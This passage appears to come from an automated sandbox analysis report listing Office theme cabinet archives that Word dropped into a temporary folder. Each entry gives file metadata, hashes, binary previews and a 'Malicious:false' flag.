                                                                                                                                              Preview:MSCF.....h......L............................h...?..................@g......o...............Element design set.dotx.................Content.inf.Y/..Re..[......f........,..]....D.],....]..X.......XC4pE.....p........2..u;L.N.....]G..d.^d.$).e.=..;..Kb.../.../....H.."...w$._I..5.....a..4.Gd5p......v.8..1..%H..\..e...3.e..A..).d*.. . (.8.".......(>..<...@...~*v&.f..LWhqk]+Uep.d..%...o.....k.......e...nNN.&_.>.d.?H`"...r?..Z.p..q..<M.N.t....{*.y]#...._XW"qI...x.......}.. .N...;.}:..m8...[.r.F....^?...o...u..*...J3.V....~...~tn#.Kf6.s.|*..,s...M.$.f..?Yu.pE.1_wU...%....._..'..Z......y:.{.J5..7..Q.w}/.~.-3~Ctw=..IT.....mI.u@...y.M....2.%...y...Y..j.k<-.Q.r...7m..b...+.6..|.....U..}[...,....^....5..D..qW...[3).p.Y<.Hh..t...%cw=Z..W.~W.F....zr.4.g...O...P.g_^..3.-............3s...S..y...u...N...EsJz....tT../..c[w{cG....../6.....:.W<d5}.q..s..K"$........Ne..5..#.v'..n4.rj....Fc=....5..VN.....6..9`....|..........WX..-?..........W.)^`1.......].R2..s6...H.......

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6B11.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):222992
                                                                                                                                              Entropy (8bit):7.994458910952451
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:6144:k8/c2cF9GTLqsTmYstUdx+dwb2ooiVOfiI17zWbQ:jbzqGdpbZ/Mf3h68
                                                                                                                                              MD5:26BEAB9CCEAFE4FBF0B7C0362681A9D2
                                                                                                                                              SHA1:F63DD970040CA9F6CFCF5793FF7D4F1F4A69C601
                                                                                                                                              SHA-256:217EC1B6E00A24583B166026DEC480D447FB564CF3BCA81984684648C272F767
                                                                                                                                              SHA-512:2BBEA62360E21E179014045EE95C7B330A086014F582439903F960375CA7E9C0CF5C0D5BB24E94279362965CA9D6A37E6AAA6A7C5969FC1970F6C50876582BE1
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF.....'......D...............]............'..H?..........z..................M{. .content.inf..l.........M{. .View.thmx......R..[...........@...G...I..(J.....B....Q!....}Ju..(BR..._|.5.%.....6m...........?.w{.rm,....#....;Ba#.:v...Dv.."u.v{!...f}......!......:.S.......".z.f.......==.n.0Km0eh.Kbm.C.r.6.........d..h.....{..w..}....2sb...rvm..x...0(..B... ...BH.r#.@..d".*..F+...Q.sx.....?...d.d.eZ2W2.2d...q.I....4.e4....#.....K...3...1.p.y......>.~V....cm....n^..b.{..._D?..AG...'...k.L&..h}=p.....Wl....(.......>.~.].....'.4.W{......../......7.....'.s...w...6..hn..e.2.).l]u.v4...GF.X..X..X....G.i.\..y.g&.<&ti......Sp,j.....>I..S..%.y..........S..-).+...>...D..............[...d...jt.~<x.a(.MDW..a..ZI.;+..!,.$...~>#...).R4...K.$.Zm......b...........{..._..A{.}..r...X...T.ZI.T.).J...$.".U,.9...r.z.)......}...()<....m....QS.p...;?..5.W~2r.EZu..P.1.%'l.........+/6.Mm.|2....Ty..f.o.S.....3J.._...X,..m....:..1.<GqFy.QA9W4.=....n...ZP...O.\.[...:8.%.^..H.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6B21.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):271273
                                                                                                                                              Entropy (8bit):7.995547668305345
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:6144:zfdvQnJMwXse4Vradf3mrC7woyWbjKlCVC7K:zfJwJse4VrS1AK
                                                                                                                                              MD5:21437897C9B88AC2CB2BB2FEF922D191
                                                                                                                                              SHA1:0CAD3D026AF2270013F67E43CB44F0568013162D
                                                                                                                                              SHA-256:372572DCBAD590F64F5D18727757CBDF9366DDE90955C79A0FCC9F536DAB0384
                                                                                                                                              SHA-512:A74DA3775C19A7AF4A689FA4D920E416AB9F40A8BDA82CCF651DDB3EACBC5E932A120ABF55F855474CEBED0B0082F45D091E211AAEA6460424BFD23C2A445CC7
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF....Q.......D...............y...........Q...XJ..........{..................M.. .content.inf.(..........M.. .Frame.thmx.1....b..[.........B.....6....ZZ}....BH..-D..}..V.V-........Z..O.....H.f..........;..@d.`......!..=;.,bp..K.q....s.y....D.qZ)p......D...r.S....s=B.4.).8B....4.a6 ...~........."....#.....}....n.Q.1cH.%c/.U....E..E...!..Da*.p....X..G..:.....1.@.....W.'...._........W.c...<.v.k.....&.8......?.h.>d._:-.X.......9..tL}........3.;.N3.D~......>.^?..|:...}......oT.z.......w..[..}:...._fu........Kk.......L..9..p..e..^......K.%...Mapqhvv..E&.^.....[...9|"l...9...U......!..w..Nya...~C.yx...w.K..q.z.j.W?t.......DY.x.S2.....]..na.Qj...X.K..^...S.hK.W...Z....s.0...NF...8C.......j.'Zc...k.%...l....S.....OW..o.Qf.x...X.;<.rO].....W.m.e....T.1.6........".....Q.3........l..v.."..I...&......w..4vE...c.s[.3.m..8.q$.....a...)...&:6..,..#..?....;.!.....~.UP.r=.}h.&U......X...]..X.e\u.G<....E....lG.@.*Z...10.D@.]....z+-.S....p..Y.PK.:.S..p.....1E`..-

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6B62.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):307348
                                                                                                                                              Entropy (8bit):7.996451393909308
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:6144:7vH3uG+yiWx0eVJyORloyyDqnHefzOs81MrXLXx7:b36yiWH/LRS2CJl1
                                                                                                                                              MD5:0EBC45AA0E67CC435D0745438371F948
                                                                                                                                              SHA1:5584210C4A8B04F9C78F703734387391D6B5B347
                                                                                                                                              SHA-256:3744BFA286CFCFF46E51E6A68823A23F55416CD6619156B5929FED1F7778F1C7
                                                                                                                                              SHA-512:31761037C723C515C1A9A404E235FE0B412222CB239B86162D17763565D0CCB010397376FB9B61B38A6AEBDD5E6857FD8383045F924AF8A83F2C9B9AF6B81407
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF....tq......D...........................tq.. ?..........|..................Mn. .Banded.thmx............Mn. .content.inf..;.u.i..[...............?....^.j.{j.B...$M/!...W....{!..^0x/.6...&............w......$.B..J.?a.$=...P..L...d..........+./.\..E:h.....-.$..u-.I..L\.M.r..Y..:rtX:....8...........+8.}{......&.-..f.f..s3-P.''.r...Z-"/E../...^%^N(,.$..$.H..O........q>...|.|......y..m.)u....`.....z.n..-.[.5....xL....M...O..3uCX..=4.....7.yh...dg.;..c.x.4..6..e..p.e"..,.!.St{..E..^I.9j....;..`.Y..#.0..f...G.....9~./....QCz.93..u%hz.........t9.""........)..7K.c~E!..x.E.p...[......o..O.j.c.......6.t{...".....t9V;xv....n<.F.S2.gI.#6...u..O..F.9.[.L.....K....#..zL..I...o....k...qog.......V..BKM..#.bET.)..&4..m.w...*....E.a[.Q.y.B...w...r.nd...)...<..#..r[4.y...#.z.....m?.2K.^...R{..m..f......r?]..>@...ra$...C+..l].9...."..rM9=......]".'...b&2e...y..a..4....ML..f...f"..l..&.Rv=2LL..4...3t_x...G....w..I.K....s.t.....).......{ur.y2...O3.K*f.*P(..F..-.y.Z...

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6B83.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):276650
                                                                                                                                              Entropy (8bit):7.995561338730199
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:6144:H2a+HFkDF8gpmMt4kzwVVqhSYO6DITxPWgJl1CFExwXyo7N:mlZgFtIVVTuDExeWuv7N
                                                                                                                                              MD5:84D8F3848E7424CBE3801F9570E05018
                                                                                                                                              SHA1:71D7F2621DA8B295CE6885F8C7C81016D583C6B1
                                                                                                                                              SHA-256:B4BC3CD34BD328AAF68289CC0ED4D5CF8167F1EE1D7BE20232ED4747FF96A80A
                                                                                                                                              SHA-512:E27873BFD95E464CB58B3855F2DA404858B935530CF74C7F86FF8B3FC3086C2FAEA09FA479F0CA7B04D87595ED8C4D07D104426FF92DFB31BED405FA7A017DA8
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF............D................................D..........~..................M. .content.inf............M. .Dividend.thmx..).}.b..[.....`.........?.R...T../..............4..yy....{...f.h..\U......sy.gV0Q.@..A..@..3a.A}........7.q.......8......R....sJ)E..ENr.S*B.1..).s.r.J.D.b."..........(.....E$.V........y.5.L....;gY..QK/nni..x..3.<..Q.Q..K.I.....T.z.,F.....{.p.....;8._.&../...........X...}.;[Gk..._.i`m.u.?...s.w...4.....m......l....5..n.?..c..m...,.....{.k.?......sC.............e..1....oL.8./......1._.K:.]..&......O............qo.....Dd/c...6.q.*......V.v........h....L..h..C+..V..;O.(7Z]{I%....S3.{h....\...b.......5.ES......Z.4...o.c`..YA....9i....M.s....Z3.oq`....>.i..@.@n.a...x.3.zp.<....vU/.|^CvE...aD.P&mhvM>.p..B~....."._.......v-.m..w..?._..=...:...k....i.}x.6....Y.i..n....h...j......LZ.....fk..f0.y.T..Vl.;...s.......B6.f.'z.c.\W?...4U)..aJ.;O....L.d7.J.V#Q.....\J.F.?].d}!..y].6..%..~....|......5...'N.#.....t6.,.E.O."..0fyz....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6B84.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):261258
                                                                                                                                              Entropy (8bit):7.99541965268665
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:6144:9blShNYrHNn0JU+D+kh8CIjXHWC7X0nZLC9Ge2KY/WfI:9ZSTYrtn0Sk+CIDHWC7chVKYx
                                                                                                                                              MD5:65828DC7BE8BA1CE61AD7142252ACC54
                                                                                                                                              SHA1:538B186EAF960A076474A64F508B6C47B7699DD3
                                                                                                                                              SHA-256:849E2E915AA61E2F831E54F337A745A5946467D539CCBD0214B4742F4E7E94FF
                                                                                                                                              SHA-512:8C129F26F77B4E73BF02DE8F9A9F432BB7E632EE4ABAD560A331C2A12DA9EF5840D737BFC1CE24FDCBB7EF39F30F98A00DD17F42C51216F37D0D237145B8DE15
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF............D...............nJ...............D.................."..........M. .content.inf....."......M. .Metropolitan.thmx...cVtP..[.....`Q..B.....=.T.....h.."...Z..|..}hZK.V....Z..Z................?..v...[S$."...H......^u.%.@...>....... f.........1.5......*&lm.tZ.msz:...Noc....1....D .........b..... ..3#pVp....}oo]{m......H*[%i.GNHB1D<......(*# ....H"....DP..b(B.<.....v......_..`.7..;.}............/.p}.:vp....~l0..].........S....G?.....}..U.;......dNi..?........-c..J.z....Z...._.O.....C..o.,......z....F....sOs$..w9......2G..:@...'....=.....M..am.....S......(`.._....'......[..K"....BD...D...^1k.....xi...Gt....{k@.W.....AZ+(,...+..o......I.+.....D..b. T.:..{..v.....g..........L.H.`...uU~C.d...{...4.N.N..m8..v.7..3.`.....,...W...s.;.fo.8.Y...2.i...T&.-...v8..v.U.Y=...8..F.hk..E.PlI.t.8......A.R....+.]lOei..2...... gS*.......%8H.....<.U.D..s.....>.....D_...../....l.......5O1S~.........B.g.++cV.z.f .R.Z.......@6....(..t^5"...#G...

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6B95.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):295527
                                                                                                                                              Entropy (8bit):7.996203550147553
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:6144:nwVaEqsf23c9shf6UyOGgDWDn/p3fd+zkPWnvGL3n9bQnkmVheyqtkl:MlPfW6sVEDn/pPdhWnvGL36zyyqal
                                                                                                                                              MD5:9A07035EF802BF89F6ED254D0DB02AB0
                                                                                                                                              SHA1:9A48C1962B5CF1EE37FEEC861A5B51CE11091E78
                                                                                                                                              SHA-256:6CB03CEBAB2C28BF5318B13EEEE49FBED8DCEDAF771DE78126D1BFE9BD81C674
                                                                                                                                              SHA-512:BE13D6D88C68FA16390B04130838D69CDB6169DC16AF0E198C905B22C25B345C541F8FCCD4690D88BE89383C19943B34EDC67793F5EB90A97CD6F6ECCB757F87
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF.....B......D...............P............B..p?..........{.................M.. .Basis.thmx...........M.. .content.inf.`g..td..[...............5..$..WM.....R.......H\.+\./^...x.^..h..MU..\........v........+......g...$.......g.....~....U].7..T..1k.H...1...c.P.rp.6K..&......,.............U4.WoG.w.....;.....v..922.;]..5_-]..%E]b..5]... (..H..II..ttA4Q..BI!|...H.7J.2D....R.......CXhi`n....6..G.~&.[..N...v..Z"t.a..K..3..).w...._@.}.}.v.......4......h....R;.8.c&.F...B^....Q.....!Bm2...F.`.......M;...#.{....c...?...e...6t..C.-.E.V.v%I..H.....m.n...$D.....vU'.....=6}~...Gw...Y..?.@......G.....k......z...5d.h......1.}..O*;e..t......Y.0...3.v).X.-.2.....~....14.[.w=I....hN....eD..7G.u.z..7.do..!....d..o.wQ.:....@/.^..<e.-..=\.....6.C.'.rW$..Cp.M3.u6z......Q.F.9.5....juc..I...m4]7L....+n......).t......2[.3.p.:.....O5y..wA........^..!..H....{..S.3w.!&.'.;...(..|m.x.S..Z.j..3...n..WU...../w.......xe=.+.D...x..qy.S.....E..... ...uu.`.,..<.6[p

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6BA5.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):230916
                                                                                                                                              Entropy (8bit):7.994759087207758
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:6144:OTIPtMXmJWnzPS3pqnkeuJXW+FNx1a72rLiQxEBTR:750nz63/FJRFLISnp+Bt
                                                                                                                                              MD5:93FA9F779520AB2D22AC4EA864B7BB34
                                                                                                                                              SHA1:D1E9F53A0E012A89978A3C9DED73FB1D380A9D8A
                                                                                                                                              SHA-256:6A3801C1D4CF0C19A990282D93AC16007F6CACB645F0E0684EF2EDAC02647833
                                                                                                                                              SHA-512:AA91B4565C88E5DA0CF294DC4A2C91EAEB6D81DCA96069DB032412E1946212A13C3580F5C0143DD28B33F4849D2C2DF2214CE1E20598D634E78663D20F03C4E6
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF.....F......D................g...........F...?..........|..................L.. .content.inf.zG.........L.. .Parcel.thmx.>2...R..[...0...........7....B+...BH....{...^.../.....B{...1....+".....<.....$........{.......sD"..j...}... P..w..U..f...6.x8. ...C..F.q.7....T.6p......B.P..L..g......A..43.W`.....{{...u.4...:.bb.4"X..m..)$..@(H. H.tBPTF..,.&.B.'...6..2...n..c%...Z@.(.@.......(.<i.i....P......?......o.......F.M.L......i.....C..7..../.....MQ.0..l.U.s.Fu.......1...p.;.(.}..ogd..<.._.Z......._.......O.J......97...~<...4.c....i..........'k.5.......Q.$..C..E... ..5.7....N.a.[ns6hi..kM....?....X......*9q...!O\....0....n.^s.9.6..............;. ..r...rf..C6z..v #.H...O...v/.sl....J.m%.L.Dp.e....*uO..g.y....f...].5.*........W.....h^[..w.|.=.ru.|.M..+.-.B...D.Ma....o.<X SnI....l...{..G..,..y5\W.@..y.;.y ...M..l.....e..A...d.e!.E..3.......k1.......6gY).../....pQ..?..s.W.)+R.S5..../.0..vz.^.......k.....v..9..A.NG...N~#..$.B...*s,(.o.@.ar.!.J.....

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6CD4.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):550906
                                                                                                                                              Entropy (8bit):7.998289614787931
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:12288:N4Ar9NyDhUQM0Hk86V1YnOIxQ9e6SJbj2OjK:jAG8wa5Qw6SZ2Oj
                                                                                                                                              MD5:1C12315C862A745A647DAD546EB4267E
                                                                                                                                              SHA1:B3FA11A511A634EEC92B051D04F8C1F0E84B3FD6
                                                                                                                                              SHA-256:4E2E93EBAC4AD3F8690B020040D1AE3F8E7905AB7286FC25671E07AA0282CAC0
                                                                                                                                              SHA-512:CA8916694D42BAC0AD38B453849958E524E9EED2343EBAA10DF7A8ACD13DF5977F91A4F2773F1E57900EF044CFA7AF8A94B3E2DCE734D7A467DBB192408BC240
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF....*#......D...............Q...........*#...D..........~..................M{. .content.inf............M{. .Parallax.thmx.9... y..[......(..b.P...E.Q*.R.".RTH.%.T..F......u.{.*+.P.....FK*0].F...a{...D4`D..V.../.P,....2.Mx...u......0...E...{A-"J...)jl_.A..T......u.Y....ZG:....V.A.#~.. ..6..............o..X..<.... .......C.ce.f!nA.).p...p........n..................'6w6H6s.j....l...{?.h..........]..l.....v....%..l}A..................3...W_73.j......6...F.../..qG.?........H..).........7.&km....`m2..m.W.q.<../~<..6*.78..X~.e+..CC*w...T...6....AB..l..._.f......s.e....2....H..r.R.Z....a.,..\Q.q..._SJJ....7.S.R....=f..>....9=....NnC.....].-...\..Z..q..j...q.....Nj..^'..k...Zl.~PRvpz.J..+.C...k.z.w=l.#.............n...C..s.kM.@B{..vL.e....E..(/......f...g..=..V...}...).=s.....y!.,...X.[..[.....\31}..D%...%..+G66.j.v./.e9...P;.o.y..U+...g.g.S.../..B._L..h...Oi.._...:..5ls>>........n6.F.Q..v>..P.r:.a..Z....a...x..D....N...i..=L.u......<;Nv.X/*.

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6DB1.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):640684
                                                                                                                                              Entropy (8bit):7.99860205353102
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:12288:eV7ivfl+kbkIrWu+2aoRjwv/cSUWauGPo2v65s4QqcT3ZCCz6CSj8aC:fdhr1+3y4MWaC2CO4V+3ZCCDsO
                                                                                                                                              MD5:F93364EEC6C4FFA5768DE545A2C34F07
                                                                                                                                              SHA1:166398552F6B7F4509732E148F93E207DD60420B
                                                                                                                                              SHA-256:296B915148B29751E68687AE37D3FAFD9FFDDF458C48EB059A964D8F2291E899
                                                                                                                                              SHA-512:4F0965B4C5F543B857D9A44C7A125DDD3E8B74837A0FDD80C1FDC841BF22FC4CE4ADB83ACA8AA65A64F8AE6D764FA7B45B58556F44CFCE92BFAC43762A3BC5F4
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF............D................4...............?..........~..................M. .content.inf."..........M. .Quotable.thmx..^.u.n..[...............&...U..F.......UU.M.T5.UUQS..j..#>43fD.....`....Vr......19'...P..j.-...6n.0c....4$.c....$.4.k3aQ$.lCN.#.[.."qc....,Z...,Qt@!.@...... ...H.......9.9.y.{....[.`..s3.5.....B....W.g.d...[uv.UW..............P.8.(.?......3.....'/F...0...8.P. .O..B....K...g..L.......#s...%..|4.i....?.3b.".....g...?.........2.O23..'..O~.+..{...C.n.L......3......Y.L...?K...o......g....@.]...T..sU.....<.._.<G.......Tu.U2..v.&..<..^..e.].cY;..9.%..}...I.y.;...WM...3>.:.=.|.-.AtT2OJ.I.#...#.y....A....\]$r...lM.%5.."...+7M..J.....c...".&$.... Y.r.B;..81B. +H...b....@7K.*.F.Z...v..=..ES.f.~.."...f..ho.X.E.a`~*...C>.&..@\.[....(.....h..]...9&...sd.H .1.x.2..t.rj..o..A..^qF.S9.5.....E.{...C|.w.c/V...0Q.M...........O.7;A4u...R..Z.B.7a.C`....p.z.....f!|.u.3t....2e.wWH..'7p....E_...e.._;..k....*&E.^.f=V..{*..al.y:.4a...+.g...-..>e

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6DB2.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):698244
                                                                                                                                              Entropy (8bit):7.997838239368002
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:12288:bUfKzAwwP7XAMWtr4FvMRt4lX0hnBdThiSb32+TdysrQgn7v4EemC6:sr7AMkJ34xu1bm4ZrQaY6
                                                                                                                                              MD5:E29CE2663A56A1444EAA3732FFB82940
                                                                                                                                              SHA1:767A14B51BE74D443B5A3FEFF4D870C61CB76501
                                                                                                                                              SHA-256:3732EB6166945DB2BF792DA04199B5C4A0FB3C96621ECBFDEAF2EA1699BA88EE
                                                                                                                                              SHA-512:6BC420F3A69E03D01A955570DC0656C83C9E842C99CF7B429122E612E1E54875C61063843D8A24DB7EC2035626F02DDABF6D84FC3902184C1EFF3583DBB4D3D8
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF....lh......D...............P...........lh...?..........|..................M. .Berlin.thmx............M. .content.inf..lH.lj..[...............7.I..)........P..5x.B/^y5.xk^^......D.F........s....y...?D.....*.....&....".o..pl..Q.jm?_...6......=%.p.{.)S..y...$......,4..>#.........)..."-....K....4.E...L=.......4..p.c..nQ.0..ZO.#.....e.N..`U......oS....V..X[t.E)|.h..R....$..}.{.F.7....^.....w.,...5rBR.....{.......mi...h.b......w+..;.hV......q..(.7&.Z.l...C."j........[-E4h.....v&..~.p$|\X...8.....Fj'%,.)6w...u|C..,y..E..`*Up../(....2.(....Z.....,.'...d..s..Z....5.g.?Nq..04...f...D.x....q+.b.."v`{.NL....C..... ..n......1N+.I.{W9....2r.0...BaC.....O..=...k..."..8.D\jK.B...Aj....6,B..2...I.. B..^.4..1.K+.....DP...Mr....9..x[...>........?.Zd..'._2.._..>..'.F..#.w...2..~.|........q_Wy.W.....~..Qex.km/..f......t.q..p..gm.|.x.... ,.#\Z....p....a.}...%..v.J.Es......I.b.P?...0......F.x....E..j..6.%..E..-O.k...b .^.h.Cv...Z....D.n.d:.d.F..x...[1...B..

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6DB3.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):723359
                                                                                                                                              Entropy (8bit):7.997550445816903
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:12288:NPnBZX7wR3tMwYqNDQGnXTtfzO5U7yo6O7bLhe8yE3LLDok4a:JBMbYE7xzO5U917bLh/DL3oJa
                                                                                                                                              MD5:748A53C6BDD5CE97BD54A76C7A334286
                                                                                                                                              SHA1:7DD9EEDB13AC187E375AD70F0622518662C61D9F
                                                                                                                                              SHA-256:9AF92B1671772E8E781B58217DAB481F0AFBCF646DE36BC1BFFC7D411D14E351
                                                                                                                                              SHA-512:EC8601D1A0DBD5D79C67AF2E90FAD44BBC0B890412842BF69065A2C7CB16C12B1C5FF594135C7B67B830779645801DA20C9BE8D629B6AD8A3BA656E0598F0540
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:MSCF....?.......D...........................?...`J..............3..............M.. .content.inf..+.........M.. .Wood_Type.thmx......r..[.........................!.wwwwqwwwwwwwwwww..."....+......nR..x..\..w..r.5R.....(|.>.$e3.!..g....f..`9NL......o./.O.bxI...7.....|........6.n."J.....4^g.........?...................o.......s3.....8. .T.j...._.Z.Q.t.k,(o.c.t.......?Z....`o........?.a....6.)....6b..../.t...........Mz....q}......C.......+{.......o...K.tQjt............7.._....O.....\....` ..............@..`....%..t....V.]........m..m....u..1.yr;..t..F.'..+{....zqvd.g._..$H..Vl...m..../....g..rG.....:*......8....h...[...a06...U.W....5.Z.W..1I..#.2.....B3...x....$PRh...\{J.c.v.y..5+Y.W.N..hG......<..F..W.d8_....c...g....p|7.]..^.o.H.[$Zj..{4......m.KZ..n.T%...4.Z..Y."q7?kuB......U....).~.......W%..!.e.U.mp.o...h...?.w...T.s.YG#......Y.}....Z.O.i.r,...n..4.\....P..m..=....f........v....g....j...*.wP..4.VK.y.z...C..oum.b.1......?.Z.>.7.!?......A..Q>..Z....-

                                                                                                                                              C:\Users\user\AppData\Local\Temp\cab6EE0.tmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):953453
                                                                                                                                              Entropy (8bit):7.99899040756787
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:24576:9B1Onw3vg7aeYPagzbJ5Vhv6LnV2Dhl7GEYqVjcyd:vww3o7BYPJbJ5Vh6UCqZfd
                                                                                                                                              MD5:D4EAC009E9E7B64B8B001AE82B8102FA
                                                                                                                                              SHA1:D8D166494D5813DB20EA1231DA4B1F8A9B312119
                                                                                                                                              SHA-256:8B0631DA4DC79E036251379A0A68C3BA977F14BCC797BA0EB9692F8BB90DDB4D
                                                                                                                                              SHA-512:561653F9920661027D006E7DEF7FB27DE23B934E4860E0DF78C97D183B7CEBD9DCE0D395E2018EEF1C02FC6818A179A661E18A2C26C4180AFEE5EF4F9C9C6035
                                                                                                                                              Malicious:false
